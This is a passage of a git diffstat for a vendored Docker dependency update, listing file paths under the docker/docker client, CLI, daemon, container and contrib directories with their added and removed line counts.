 .../docker/cli/command/container/update.go    |  163 -
 .../docker/cli/command/container/utils.go     |  143 -
 .../docker/cli/command/container/wait.go      |   50 -
 .../docker/docker/cli/command/events_utils.go |   49 -
 .../docker/cli/command/formatter/container.go |  235 -
 .../cli/command/formatter/container_test.go   |  398 --
 .../docker/cli/command/formatter/custom.go    |   51 -
 .../cli/command/formatter/custom_test.go      |   28 -
 .../cli/command/formatter/disk_usage.go       |  334 -
 .../docker/cli/command/formatter/formatter.go |  123 -
 .../docker/cli/command/formatter/image.go     |  259 -
 .../cli/command/formatter/image_test.go       |  333 -
 .../docker/cli/command/formatter/network.go   |  117 -
 .../cli/command/formatter/network_test.go     |  208 -
 .../docker/cli/command/formatter/reflect.go   |   65 -
 .../cli/command/formatter/reflect_test.go     |   66 -
 .../docker/cli/command/formatter/service.go   |  322 -
 .../docker/cli/command/formatter/stats.go     |  211 -
 .../cli/command/formatter/stats_test.go       |  228 -
 .../docker/cli/command/formatter/volume.go    |  121 -
 .../cli/command/formatter/volume_test.go      |  189 -
 .../cli/command/idresolver/idresolver.go      |   90 -
 .../docker/docker/cli/command/image/build.go  |  477 --
 .../docker/docker/cli/command/image/cmd.go    |   33 -
 .../docker/cli/command/image/history.go       |   99 -
 .../docker/docker/cli/command/image/import.go |   88 -
 .../docker/cli/command/image/inspect.go       |   44 -
 .../docker/docker/cli/command/image/list.go   |   96 -
 .../docker/docker/cli/command/image/load.go   |   77 -
 .../docker/docker/cli/command/image/prune.go  |   92 -
 .../docker/docker/cli/command/image/pull.go   |   84 -
 .../docker/docker/cli/command/image/push.go   |   61 -
 .../docker/docker/cli/command/image/remove.go |   77 -
 .../docker/docker/cli/command/image/save.go   |   57 -
 .../docker/docker/cli/command/image/tag.go    |   41 -
 .../docker/docker/cli/command/image/trust.go  |  381 -
 .../docker/cli/command/image/trust_test.go    |   57 -
 .../docker/docker/cli/command/in.go           |   75 -
 .../docker/cli/command/inspect/inspector.go   |  195 -
 .../cli/command/inspect/inspector_test.go     |  221 -
 .../docker/docker/cli/command/network/cmd.go  |   28 -
 .../docker/cli/command/network/connect.go     |   64 -
 .../docker/cli/command/network/create.go      |  226 -
 .../docker/cli/command/network/disconnect.go  |   41 -
 .../docker/cli/command/network/inspect.go     |   45 -
 .../docker/docker/cli/command/network/list.go |   76 -
 .../docker/cli/command/network/prune.go       |   73 -
 .../docker/cli/command/network/remove.go      |   43 -
 .../docker/docker/cli/command/node/cmd.go     |   43 -
 .../docker/docker/cli/command/node/demote.go  |   36 -
 .../docker/docker/cli/command/node/inspect.go |  144 -
 .../docker/docker/cli/command/node/list.go    |  115 -
 .../docker/docker/cli/command/node/opts.go    |   60 -
 .../docker/docker/cli/command/node/promote.go |   36 -
 .../docker/docker/cli/command/node/ps.go      |   93 -
 .../docker/docker/cli/command/node/remove.go  |   56 -
 .../docker/docker/cli/command/node/update.go  |  121 -
 .../docker/docker/cli/command/out.go          |   69 -
 .../docker/docker/cli/command/plugin/cmd.go   |   31 -
 .../docker/cli/command/plugin/create.go       |  125 -
 .../docker/cli/command/plugin/disable.go      |   36 -
 .../docker/cli/command/plugin/enable.go       |   47 -
 .../docker/cli/command/plugin/inspect.go      |   42 -
 .../docker/cli/command/plugin/install.go      |  208 -
 .../docker/docker/cli/command/plugin/list.go  |   63 -
 .../docker/docker/cli/command/plugin/push.go  |   71 -
 .../docker/cli/command/plugin/remove.go       |   55 -
 .../docker/docker/cli/command/plugin/set.go   |   22 -
 .../docker/cli/command/plugin/upgrade.go      |  100 -
 .../docker/docker/cli/command/prune/prune.go  |   50 -
 .../docker/docker/cli/command/registry.go     |  186 -
 .../docker/cli/command/registry/login.go      |   85 -
 .../docker/cli/command/registry/logout.go     |   77 -
 .../docker/cli/command/registry/search.go     |  126 -
 .../docker/docker/cli/command/secret/cmd.go   |   25 -
 .../docker/cli/command/secret/create.go       |   79 -
 .../docker/cli/command/secret/inspect.go      |   45 -
 .../docker/docker/cli/command/secret/ls.go    |   68 -
 .../docker/cli/command/secret/remove.go       |   57 -
 .../docker/docker/cli/command/secret/utils.go |   76 -
 .../docker/docker/cli/command/service/cmd.go  |   29 -
 .../docker/cli/command/service/create.go      |  100 -
 .../docker/cli/command/service/inspect.go     |   84 -
 .../cli/command/service/inspect_test.go       |  129 -
 .../docker/docker/cli/command/service/list.go |  158 -
 .../docker/docker/cli/command/service/logs.go |  163 -
 .../docker/docker/cli/command/service/opts.go |  648 --
 .../docker/cli/command/service/opts_test.go   |  107 -
 .../docker/cli/command/service/parse.go       |   68 -
 .../docker/docker/cli/command/service/ps.go   |   76 -
 .../docker/cli/command/service/remove.go      |   47 -
 .../docker/cli/command/service/scale.go       |   96 -
 .../docker/cli/command/service/trust.go       |   96 -
 .../docker/cli/command/service/update.go      |  849 ---
 .../docker/cli/command/service/update_test.go |  384 -
 .../docker/docker/cli/command/stack/cmd.go    |   35 -
 .../docker/docker/cli/command/stack/common.go |   60 -
 .../docker/docker/cli/command/stack/deploy.go |  357 -
 .../cli/command/stack/deploy_bundlefile.go    |   83 -
 .../docker/docker/cli/command/stack/list.go   |  113 -
 .../docker/docker/cli/command/stack/opts.go   |   49 -
 .../docker/docker/cli/command/stack/ps.go     |   61 -
 .../docker/docker/cli/command/stack/remove.go |  112 -
 .../docker/cli/command/stack/services.go      |   79 -
 .../docker/docker/cli/command/swarm/cmd.go    |   28 -
 .../docker/docker/cli/command/swarm/init.go   |   85 -
 .../docker/docker/cli/command/swarm/join.go   |   69 -
 .../docker/cli/command/swarm/join_token.go    |  105 -
 .../docker/docker/cli/command/swarm/leave.go  |   44 -
 .../docker/docker/cli/command/swarm/opts.go   |  209 -
 .../docker/cli/command/swarm/opts_test.go     |   37 -
 .../docker/docker/cli/command/swarm/unlock.go |   54 -
 .../docker/cli/command/swarm/unlock_key.go    |   79 -
 .../docker/docker/cli/command/swarm/update.go |   72 -
 .../docker/docker/cli/command/system/cmd.go   |   26 -
 .../docker/docker/cli/command/system/df.go    |   56 -
 .../docker/cli/command/system/events.go       |  140 -
 .../docker/docker/cli/command/system/info.go  |  334 -
 .../docker/cli/command/system/inspect.go      |  203 -
 .../docker/docker/cli/command/system/prune.go |   93 -
 .../docker/cli/command/system/version.go      |  113 -
 .../docker/docker/cli/command/task/print.go   |  161 -
 .../docker/docker/cli/command/trust.go        |   39 -
 .../docker/docker/cli/command/utils.go        |   87 -
 .../docker/docker/cli/command/volume/cmd.go   |   45 -
 .../docker/cli/command/volume/create.go       |  111 -
 .../docker/cli/command/volume/inspect.go      |   55 -
 .../docker/docker/cli/command/volume/list.go  |   91 -
 .../docker/docker/cli/command/volume/prune.go |   75 -
 .../docker/cli/command/volume/remove.go       |   68 -
 .../docker/cli/compose/convert/compose.go     |  116 -
 .../cli/compose/convert/compose_test.go       |  122 -
 .../docker/cli/compose/convert/service.go     |  416 --
 .../cli/compose/convert/service_test.go       |  216 -
 .../docker/cli/compose/convert/volume.go      |  128 -
 .../docker/cli/compose/convert/volume_test.go |  133 -
 .../compose/interpolation/interpolation.go    |   90 -
 .../interpolation/interpolation_test.go       |   59 -
 .../docker/cli/compose/loader/example1.env    |    8 -
 .../docker/cli/compose/loader/example2.env    |    1 -
 .../cli/compose/loader/full-example.yml       |  287 -
 .../docker/cli/compose/loader/loader.go       |  653 --
 .../docker/cli/compose/loader/loader_test.go  |  800 ---
 .../docker/cli/compose/schema/bindata.go      |  260 -
 .../schema/data/config_schema_v3.0.json       |  383 -
 .../schema/data/config_schema_v3.1.json       |  428 --
 .../docker/cli/compose/schema/schema.go       |  137 -
 .../docker/cli/compose/schema/schema_test.go  |   52 -
 .../docker/cli/compose/template/template.go   |  100 -
 .../cli/compose/template/template_test.go     |   83 -
 .../docker/docker/cli/compose/types/types.go  |  253 -
 .../docker/docker/cli/config/configdir.go     |   25 +
 .../docker/docker/cli/debug/debug.go          |   26 +
 .../docker/{utils => cli/debug}/debug_test.go |   22 +-
 vendor/github.com/docker/docker/cli/error.go  |    2 +-
 .../docker/docker/cli/flags/client.go         |   13 -
 .../docker/docker/cli/flags/common_test.go    |   42 -
 .../github.com/docker/docker/cli/required.go  |   77 +-
 .../docker/docker/cli/trust/trust.go          |  232 -
 .../docker/docker/cliconfig/config.go         |  120 -
 .../docker/docker/cliconfig/config_test.go    |  621 --
 .../docker/cliconfig/configfile/file.go       |  183 -
 .../docker/cliconfig/configfile/file_test.go  |   27 -
 .../cliconfig/credentials/credentials.go      |   17 -
 .../cliconfig/credentials/default_store.go    |   22 -
 .../credentials/default_store_darwin.go       |    3 -
 .../credentials/default_store_linux.go        |    3 -
 .../credentials/default_store_unsupported.go  |    5 -
 .../credentials/default_store_windows.go      |    3 -
 .../cliconfig/credentials/file_store.go       |   53 -
 .../cliconfig/credentials/file_store_test.go  |  139 -
 .../cliconfig/credentials/native_store.go     |  144 -
 .../credentials/native_store_test.go          |  355 -
 .../docker/docker/client/build_cancel.go      |   21 +
 .../docker/docker/client/build_prune.go       |   30 +
 .../docker/docker/client/checkpoint_create.go |    5 +-
 .../docker/client/checkpoint_create_test.go   |    4 +-
 .../docker/docker/client/checkpoint_delete.go |    4 +-
 .../docker/client/checkpoint_delete_test.go   |    4 +-
 .../docker/docker/client/checkpoint_list.go   |    8 +-
 .../docker/client/checkpoint_list_test.go     |   15 +-
 .../github.com/docker/docker/client/client.go |  326 +-
 .../docker/docker/client/client_mock_test.go  |   10 +-
 .../docker/docker/client/client_test.go       |  376 +-
 .../docker/docker/client/client_unix.go       |    7 +-
 .../docker/docker/client/client_windows.go    |    5 +-
 .../docker/docker/client/config_create.go     |   25 +
 .../docker/client/config_create_test.go       |   70 +
 .../docker/docker/client/config_inspect.go    |   36 +
 .../docker/client/config_inspect_test.go      |  103 +
 .../docker/docker/client/config_list.go       |   38 +
 .../docker/docker/client/config_list_test.go  |  107 +
 .../docker/docker/client/config_remove.go     |   13 +
 .../docker/client/config_remove_test.go       |   60 +
 .../docker/docker/client/config_update.go     |   21 +
 .../docker/client/config_update_test.go       |   61 +
 .../docker/docker/client/container_attach.go  |   24 +-
 .../docker/docker/client/container_commit.go  |   20 +-
 .../docker/client/container_commit_test.go    |    6 +-
 .../docker/docker/client/container_copy.go    |   30 +-
 .../docker/client/container_copy_test.go      |   37 +-
 .../docker/docker/client/container_create.go  |   12 +-
 .../docker/client/container_create_test.go    |   50 +-
 .../docker/docker/client/container_diff.go    |   10 +-
 .../docker/client/container_diff_test.go      |    8 +-
 .../docker/docker/client/container_exec.go    |    6 +-
 .../docker/client/container_exec_test.go      |    5 +-
 .../docker/docker/client/container_export.go  |    5 +-
 .../docker/client/container_export_test.go    |    5 +-
 .../docker/docker/client/container_inspect.go |   21 +-
 .../docker/client/container_inspect_test.go   |   27 +-
 .../docker/docker/client/container_kill.go    |    5 +-
 .../docker/client/container_kill_test.go      |    5 +-
 .../docker/docker/client/container_list.go    |    4 +-
 .../docker/client/container_list_test.go      |    4 +-
 .../docker/docker/client/container_logs.go    |   38 +-
 .../docker/client/container_logs_test.go      |   77 +-
 .../docker/docker/client/container_pause.go   |    4 +-
 .../docker/client/container_pause_test.go     |    5 +-
 .../docker/docker/client/container_prune.go   |    4 +-
 .../docker/client/container_prune_test.go     |  125 +
 .../docker/docker/client/container_remove.go  |    6 +-
 .../docker/client/container_remove_test.go    |   21 +-
 .../docker/docker/client/container_rename.go  |    5 +-
 .../docker/client/container_rename_test.go    |    5 +-
 .../docker/docker/client/container_resize.go  |    4 +-
 .../docker/client/container_resize_test.go    |    4 +-
 .../docker/docker/client/container_restart.go |    4 +-
 .../docker/client/container_restart_test.go   |    5 +-
 .../docker/docker/client/container_start.go   |    5 +-
 .../docker/client/container_start_test.go     |    5 +-
 .../docker/docker/client/container_stats.go   |    4 +-
 .../docker/client/container_stats_test.go     |    5 +-
 .../docker/docker/client/container_stop.go    |   13 +-
 .../docker/client/container_stop_test.go      |    5 +-
 .../docker/docker/client/container_top.go     |   10 +-
 .../docker/client/container_top_test.go       |    8 +-
 .../docker/docker/client/container_unpause.go |    4 +-
 .../docker/client/container_unpause_test.go   |    5 +-
 .../docker/docker/client/container_update.go  |    4 +-
 .../docker/client/container_update_test.go    |    4 +-
 .../docker/docker/client/container_wait.go    |   85 +-
 .../docker/client/container_wait_test.go      |   35 +-
 .../docker/docker/client/disk_usage.go        |    4 +-
 .../docker/docker/client/disk_usage_test.go   |   55 +
 .../docker/client/distribution_inspect.go     |   38 +
 .../client/distribution_inspect_test.go       |   32 +
 .../github.com/docker/docker/client/errors.go |  224 +-
 .../github.com/docker/docker/client/events.go |    5 +-
 .../docker/docker/client/events_test.go       |    5 +-
 .../github.com/docker/docker/client/hijack.go |  186 +-
 .../docker/docker/client/hijack_test.go       |  103 +
 .../docker/docker/client/image_build.go       |   28 +-
 .../docker/docker/client/image_build_test.go  |    9 +-
 .../docker/docker/client/image_create.go      |   17 +-
 .../docker/docker/client/image_create_test.go |    5 +-
 .../docker/docker/client/image_history.go     |   10 +-
 .../docker/client/image_history_test.go       |    8 +-
 .../docker/docker/client/image_import.go      |   11 +-
 .../docker/docker/client/image_import_test.go |    6 +-
 .../docker/docker/client/image_inspect.go     |   13 +-
 .../docker/client/image_inspect_test.go       |   19 +-
 .../docker/docker/client/image_list.go        |    4 +-
 .../docker/docker/client/image_list_test.go   |    4 +-
 .../docker/docker/client/image_load.go        |    5 +-
 .../docker/docker/client/image_load_test.go   |    5 +-
 .../docker/docker/client/image_prune.go       |    4 +-
 .../docker/docker/client/image_prune_test.go  |  120 +
 .../docker/docker/client/image_pull.go        |   36 +-
 .../docker/docker/client/image_pull_test.go   |    7 +-
 .../docker/docker/client/image_push.go        |   23 +-
 .../docker/docker/client/image_push_test.go   |    7 +-
 .../docker/docker/client/image_remove.go      |   10 +-
 .../docker/docker/client/image_remove_test.go |   20 +-
 .../docker/docker/client/image_save.go        |    5 +-
 .../docker/docker/client/image_save_test.go   |    8 +-
 .../docker/docker/client/image_search.go      |    6 +-
 .../docker/docker/client/image_search_test.go |    7 +-
 .../docker/docker/client/image_tag.go         |   33 +-
 .../docker/docker/client/image_tag_test.go    |   31 +-
 .../github.com/docker/docker/client/info.go   |    4 +-
 .../docker/docker/client/info_test.go         |    4 +-
 .../docker/docker/client/interface.go         |   71 +-
 .../docker/client/interface_experimental.go   |    5 +-
 .../docker/docker/client/interface_stable.go  |    2 +-
 .../github.com/docker/docker/client/login.go  |    6 +-
 .../docker/docker/client/network_connect.go   |    5 +-
 .../docker/client/network_connect_test.go     |    9 +-
 .../docker/docker/client/network_create.go    |    4 +-
 .../docker/client/network_create_test.go      |    4 +-
 .../docker/client/network_disconnect.go       |    5 +-
 .../docker/client/network_disconnect_test.go  |    4 +-
 .../docker/docker/client/network_inspect.go   |   35 +-
 .../docker/client/network_inspect_test.go     |   79 +-
 .../docker/docker/client/network_list.go      |    4 +-
 .../docker/docker/client/network_list_test.go |    4 +-
 .../docker/docker/client/network_prune.go     |    4 +-
 .../docker/client/network_prune_test.go       |  113 +
 .../docker/docker/client/network_remove.go    |    6 +-
 .../docker/client/network_remove_test.go      |    5 +-
 .../docker/docker/client/node_inspect.go      |   13 +-
 .../docker/docker/client/node_inspect_test.go |   21 +-
 .../docker/docker/client/node_list.go         |    6 +-
 .../docker/docker/client/node_list_test.go    |    4 +-
 .../docker/docker/client/node_remove.go       |    7 +-
 .../docker/docker/client/node_remove_test.go  |    5 +-
 .../docker/docker/client/node_update.go       |    4 +-
 .../docker/docker/client/node_update_test.go  |    5 +-
 .../github.com/docker/docker/client/ping.go   |   22 +-
 .../docker/docker/client/ping_test.go         |   83 +
 .../docker/docker/client/plugin_create.go     |    6 +-
 .../docker/docker/client/plugin_disable.go    |    4 +-
 .../docker/client/plugin_disable_test.go      |    4 +-
 .../docker/docker/client/plugin_enable.go     |    4 +-
 .../docker/client/plugin_enable_test.go       |    4 +-
 .../docker/docker/client/plugin_inspect.go    |   13 +-
 .../docker/client/plugin_inspect_test.go      |   17 +-
 .../docker/docker/client/plugin_install.go    |   10 +-
 .../docker/docker/client/plugin_list.go       |   21 +-
 .../docker/docker/client/plugin_list_test.go  |  108 +-
 .../docker/docker/client/plugin_push.go       |    5 +-
 .../docker/docker/client/plugin_push_test.go  |    5 +-
 .../docker/docker/client/plugin_remove.go     |    6 +-
 .../docker/client/plugin_remove_test.go       |    7 +-
 .../docker/docker/client/plugin_set.go        |    4 +-
 .../docker/docker/client/plugin_set_test.go   |    5 +-
 .../docker/docker/client/plugin_upgrade.go    |   12 +-
 .../docker/docker/client/request.go           |   78 +-
 .../docker/docker/client/request_test.go      |   23 +-
 .../docker/docker/client/secret_create.go     |   11 +-
 .../docker/client/secret_create_test.go       |   21 +-
 .../docker/docker/client/secret_inspect.go    |   16 +-
 .../docker/client/secret_inspect_test.go      |   41 +-
 .../docker/docker/client/secret_list.go       |    9 +-
 .../docker/docker/client/secret_list_test.go  |   21 +-
 .../docker/docker/client/secret_remove.go     |    9 +-
 .../docker/client/secret_remove_test.go       |   21 +-
 .../docker/docker/client/secret_update.go     |   10 +-
 .../docker/client/secret_update_test.go       |   22 +-
 .../docker/docker/client/service_create.go    |  146 +-
 .../docker/client/service_create_test.go      |  158 +-
 .../docker/docker/client/service_inspect.go   |   22 +-
 .../docker/client/service_inspect_test.go     |   28 +-
 .../docker/docker/client/service_list.go      |    6 +-
 .../docker/docker/client/service_list_test.go |    4 +-
 .../docker/docker/client/service_logs.go      |    8 +-
 .../docker/docker/client/service_logs_test.go |   46 +-
 .../docker/docker/client/service_remove.go    |    6 +-
 .../docker/client/service_remove_test.go      |   18 +-
 .../docker/docker/client/service_update.go    |   63 +-
 .../docker/client/service_update_test.go      |    5 +-
 .../docker/docker/client/session.go           |   18 +
 .../docker/client/swarm_get_unlock_key.go     |    4 +-
 .../client/swarm_get_unlock_key_test.go       |   59 +
 .../docker/docker/client/swarm_init.go        |    6 +-
 .../docker/docker/client/swarm_init_test.go   |    5 +-
 .../docker/docker/client/swarm_inspect.go     |    6 +-
 .../docker/client/swarm_inspect_test.go       |    4 +-
 .../docker/docker/client/swarm_join.go        |    7 +-
 .../docker/docker/client/swarm_join_test.go   |    5 +-
 .../docker/docker/client/swarm_leave.go       |    7 +-
 .../docker/docker/client/swarm_leave_test.go  |    5 +-
 .../docker/docker/client/swarm_unlock.go      |   11 +-
 .../docker/docker/client/swarm_unlock_test.go |   48 +
 .../docker/docker/client/swarm_update.go      |    6 +-
 .../docker/docker/client/swarm_update_test.go |    5 +-
 .../docker/docker/client/task_inspect.go      |   14 +-
 .../docker/docker/client/task_inspect_test.go |   17 +-
 .../docker/docker/client/task_list.go         |    6 +-
 .../docker/docker/client/task_list_test.go    |    4 +-
 .../docker/docker/client/task_logs.go         |   51 +
 .../docker/docker/client/transport.go         |   15 +-
 .../github.com/docker/docker/client/utils.go  |    7 +-
 .../docker/docker/client/version.go           |    4 +-
 .../docker/docker/client/volume_create.go     |    6 +-
 .../docker/client/volume_create_test.go       |    8 +-
 .../docker/docker/client/volume_inspect.go    |   14 +-
 .../docker/client/volume_inspect_test.go      |   53 +-
 .../docker/docker/client/volume_list.go       |    8 +-
 .../docker/docker/client/volume_list_test.go  |    6 +-
 .../docker/docker/client/volume_prune.go      |    6 +-
 .../docker/docker/client/volume_remove.go     |    6 +-
 .../docker/client/volume_remove_test.go       |    5 +-
 .../docker/docker/cmd/docker/daemon_none.go   |   27 -
 .../docker/cmd/docker/daemon_none_test.go     |   17 -
 .../docker/cmd/docker/daemon_unit_test.go     |   30 -
 .../docker/docker/cmd/docker/daemon_unix.go   |   79 -
 .../docker/docker/cmd/docker/docker.go        |  180 -
 .../docker/docker/cmd/docker/docker_test.go   |   32 -
 .../docker/cmd/docker/docker_windows.go       |   18 -
 .../docker/docker/cmd/dockerd/config.go       |   99 +
 .../docker/cmd/dockerd/config_common_unix.go  |   34 +
 .../docker/docker/cmd/dockerd/config_unix.go  |   50 +
 .../docker/cmd/dockerd/config_unix_test.go    |   23 +
 .../docker/cmd/dockerd/config_windows.go      |   26 +
 .../docker/docker/cmd/dockerd/daemon.go       |  590 +-
 .../docker/cmd/dockerd/daemon_freebsd.go      |    4 +
 .../docker/docker/cmd/dockerd/daemon_linux.go |    8 +-
 .../docker/cmd/dockerd/daemon_solaris.go      |   85 -
 .../docker/docker/cmd/dockerd/daemon_test.go  |  149 +-
 .../docker/docker/cmd/dockerd/daemon_unix.go  |   76 +-
 .../docker/cmd/dockerd/daemon_unix_test.go    |   95 +-
 .../docker/cmd/dockerd/daemon_windows.go      |   47 +-
 .../docker/docker/cmd/dockerd/docker.go       |   77 +-
 .../docker/docker/cmd/dockerd/docker_unix.go  |    8 +
 .../docker/cmd/dockerd/docker_windows.go      |   36 +-
 .../dockerd/hack/malformed_host_override.go   |    4 +-
 .../hack/malformed_host_override_test.go      |    2 +-
 .../docker/docker/cmd/dockerd/metrics.go      |    4 +-
 .../common.go => cmd/dockerd/options.go}      |   76 +-
 .../docker/docker/cmd/dockerd/options_test.go |   44 +
 .../docker/cmd/dockerd/service_unsupported.go |    4 -
 .../docker/cmd/dockerd/service_windows.go     |   50 +-
 vendor/github.com/docker/docker/codecov.yml   |   17 +
 .../docker/docker/container/archive.go        |   32 +-
 .../docker/docker/container/container.go      |  859 +--
 .../docker/container/container_linux.go       |    9 -
 .../docker/container/container_notlinux.go    |   23 -
 .../docker/container/container_unit_test.go   |   96 +-
 .../docker/docker/container/container_unix.go |  337 +-
 .../docker/container/container_windows.go     |  200 +-
 .../github.com/docker/docker/container/env.go |   43 +
 .../utils_test.go => container/env_test.go}   |    9 +-
 .../docker/docker/container/health.go         |   55 +-
 .../docker/docker/container/history.go        |    2 +-
 .../docker/docker/container/memory_store.go   |    2 +-
 .../docker/container/memory_store_test.go     |    6 +-
 .../docker/docker/container/monitor.go        |    4 +-
 .../docker/docker/container/mounts_unix.go    |    2 +-
 .../docker/docker/container/mounts_windows.go |    2 +-
 .../docker/docker/container/state.go          |  256 +-
 .../docker/docker/container/state_solaris.go  |    7 -
 .../docker/docker/container/state_test.go     |  155 +-
 .../docker/docker/container/state_unix.go     |   10 -
 .../docker/docker/container/state_windows.go  |    7 -
 .../docker/docker/container/store.go          |    2 +-
 .../docker/docker/container/stream/attach.go  |  175 +
 .../docker/docker/container/stream/streams.go |   17 +-
 .../docker/docker/container/view.go           |  494 ++
 .../docker/docker/container/view_test.go      |  186 +
 .../contrib/builder/deb/aarch64/build.sh      |   10 -
 .../contrib/builder/deb/aarch64/generate.sh   |  118 -
 .../deb/aarch64/ubuntu-trusty/Dockerfile      |   24 -
 .../deb/aarch64/ubuntu-xenial/Dockerfile      |   22 -
 .../contrib/builder/deb/amd64/README.md       |    5 -
 .../docker/contrib/builder/deb/amd64/build.sh |   10 -
 .../deb/amd64/debian-jessie/Dockerfile        |   20 -
 .../deb/amd64/debian-stretch/Dockerfile       |   20 -
 .../deb/amd64/debian-wheezy/Dockerfile        |   22 -
 .../contrib/builder/deb/amd64/generate.sh     |  149 -
 .../deb/amd64/ubuntu-precise/Dockerfile       |   16 -
 .../deb/amd64/ubuntu-trusty/Dockerfile        |   16 -
 .../deb/amd64/ubuntu-xenial/Dockerfile        |   16 -
 .../deb/amd64/ubuntu-yakkety/Dockerfile       |   16 -
 .../deb/armhf/debian-jessie/Dockerfile        |   20 -
 .../contrib/builder/deb/armhf/generate.sh     |  158 -
 .../deb/armhf/raspbian-jessie/Dockerfile      |   22 -
 .../deb/armhf/ubuntu-trusty/Dockerfile        |   16 -
 .../deb/armhf/ubuntu-xenial/Dockerfile        |   16 -
 .../deb/armhf/ubuntu-yakkety/Dockerfile       |   16 -
 .../contrib/builder/deb/ppc64le/build.sh      |   10 -
 .../contrib/builder/deb/ppc64le/generate.sh   |  103 -
 .../deb/ppc64le/ubuntu-trusty/Dockerfile      |   16 -
 .../deb/ppc64le/ubuntu-xenial/Dockerfile      |   16 -
 .../deb/ppc64le/ubuntu-yakkety/Dockerfile     |   16 -
 .../docker/contrib/builder/deb/s390x/build.sh |   10 -
 .../contrib/builder/deb/s390x/generate.sh     |   96 -
 .../deb/s390x/ubuntu-xenial/Dockerfile        |   16 -
 .../contrib/builder/rpm/amd64/README.md       |    5 -
 .../docker/contrib/builder/rpm/amd64/build.sh |   10 -
 .../builder/rpm/amd64/centos-7/Dockerfile     |   19 -
 .../builder/rpm/amd64/fedora-24/Dockerfile    |   19 -
 .../builder/rpm/amd64/fedora-25/Dockerfile    |   19 -
 .../contrib/builder/rpm/amd64/generate.sh     |  189 -
 .../rpm/amd64/opensuse-13.2/Dockerfile        |   18 -
 .../rpm/amd64/oraclelinux-6/Dockerfile        |   28 -
 .../rpm/amd64/oraclelinux-7/Dockerfile        |   18 -
 .../builder/rpm/amd64/photon-1.0/Dockerfile   |   18 -
 .../docker/docker/contrib/check-config.sh     |   10 +-
 .../docker/contrib/completion/REVIEWERS       |    2 -
 .../docker/contrib/completion/bash/docker     | 4282 ------------
 .../contrib/completion/fish/docker.fish       |  405 --
 .../contrib/completion/powershell/readme.txt  |    1 -
 .../docker/contrib/completion/zsh/REVIEWERS   |    2 -
 .../docker/contrib/completion/zsh/_docker     | 2787 --------
 .../desktop-integration/chromium/Dockerfile   |    2 +-
 .../desktop-integration/gparted/Dockerfile    |    2 +-
 .../contrib/docker-device-tool/device_tool.go |   15 +-
 .../contrib/docker-machine-install-bundle.sh  |  111 +
 .../contrib/download-frozen-image-v1.sh       |    2 +-
 .../contrib/download-frozen-image-v2.sh       |  308 +-
 .../docker/docker/contrib/gitdm/domain-map    |   10 +-
 .../docker/contrib/gitdm/generate_aliases.sh  |    2 +-
 .../contrib/httpserver/Dockerfile.solaris     |    4 -
 .../docker/contrib/init/openrc/docker.confd   |   10 +
 .../docker/contrib/init/openrc/docker.initd   |    4 +-
 .../contrib/init/systemd/docker.service       |    7 +-
 .../contrib/init/systemd/docker.service.rpm   |    7 +-
 .../contrib/init/sysvinit-debian/docker       |   10 +-
 .../docker/docker/contrib/mkimage-alpine.sh   |   13 +-
 .../docker/docker/contrib/mkimage-busybox.sh  |   43 -
 .../docker/contrib/mkimage-debootstrap.sh     |  297 -
 .../docker/docker/contrib/mkimage-rinse.sh    |  123 -
 .../docker/docker/contrib/mkimage-yum.sh      |    4 +-
 .../docker/docker/contrib/mkimage.sh          |    8 -
 .../docker/docker/contrib/mkimage/debootstrap |   29 +-
 .../docker/docker/contrib/mkimage/solaris     |   89 -
 .../docker/contrib/nuke-graph-directory.sh    |    2 +-
 .../docker/docker/contrib/project-stats.sh    |   22 -
 .../docker/docker/contrib/reprepro/suites.sh  |   12 -
 .../docker-engine-selinux/LICENSE             |  339 -
 .../docker-engine-selinux/Makefile            |   23 -
 .../docker-engine-selinux/README.md           |    1 -
 .../docker-engine-selinux/docker.fc           |   29 -
 .../docker-engine-selinux/docker.if           |  523 --
 .../docker-engine-selinux/docker.te           |  399 --
 .../docker-engine-selinux/LICENSE             |  339 -
 .../docker-engine-selinux/Makefile            |   23 -
 .../docker-engine-selinux/README.md           |    1 -
 .../docker-engine-selinux/docker.fc           |   33 -
 .../docker-engine-selinux/docker.if           |  659 --
 .../docker-engine-selinux/docker.te           |  465 --
 .../selinux/docker-engine-selinux/LICENSE     |  340 -
 .../selinux/docker-engine-selinux/Makefile    |   16 -
 .../selinux/docker-engine-selinux/docker.fc   |   18 -
 .../selinux/docker-engine-selinux/docker.if   |  461 --
 .../selinux/docker-engine-selinux/docker.te   |  407 --
 .../docker-engine-selinux/docker_selinux.8.gz |  Bin 2847 -> 0 bytes
 .../Syntaxes/Dockerfile.tmLanguage            |   21 +-
 .../syntax/vim/ftdetect/dockerfile.vim        |    2 +-
 .../docker/docker/contrib/syscall-test/ns.c   |    2 +-
 .../docker/contrib/syscall-test/userns.c      |    2 +-
 .../docker/contrib/vagrant-docker/README.md   |    4 +-
 .../docker/docker/daemon/apparmor_default.go  |    4 +-
 .../daemon/apparmor_default_unsupported.go    |    2 +-
 .../docker/docker/daemon/archive.go           |  273 +-
 .../docker/daemon/archive_tarcopyoptions.go   |   15 +
 .../daemon/archive_tarcopyoptions_unix.go     |   25 +
 .../daemon/archive_tarcopyoptions_windows.go  |   10 +
 .../docker/docker/daemon/archive_unix.go      |   43 +-
 .../docker/docker/daemon/archive_windows.go   |   29 +-
 .../github.com/docker/docker/daemon/attach.go |  154 +-
 .../github.com/docker/docker/daemon/auth.go   |    4 +-
 .../docker/docker/daemon/bindmount_solaris.go |    5 -
 .../docker/docker/daemon/bindmount_unix.go    |    2 +-
 .../daemon/caps/{utils_unix.go => utils.go}   |   28 +-
 .../docker/docker/daemon/changes.go           |    5 +-
 .../docker/docker/daemon/checkpoint.go        |   79 +-
 .../docker/docker/daemon/cluster.go           |   16 +-
 .../docker/docker/daemon/cluster/cluster.go   | 1959 +-----
 .../docker/docker/daemon/cluster/configs.go   |  118 +
 .../cluster/controllers/plugin/controller.go  |  261 +
 .../controllers/plugin/controller_test.go     |  390 ++
 .../docker/daemon/cluster/convert/config.go   |   78 +
 .../daemon/cluster/convert/container.go       |  255 +-
 .../docker/daemon/cluster/convert/network.go  |   86 +-
 .../daemon/cluster/convert/network_test.go    |   34 +
 .../docker/daemon/cluster/convert/node.go     |   21 +-
 .../docker/daemon/cluster/convert/secret.go   |   38 +-
 .../docker/daemon/cluster/convert/service.go  |  445 +-
 .../daemon/cluster/convert/service_test.go    |  308 +
 .../docker/daemon/cluster/convert/swarm.go    |   47 +-
 .../docker/daemon/cluster/convert/task.go     |   62 +-
 .../docker/docker/daemon/cluster/errors.go    |   61 +
 .../docker/daemon/cluster/executor/backend.go |   38 +-
 .../cluster/executor/container/adapter.go     |  144 +-
 .../cluster/executor/container/attachment.go  |   21 +-
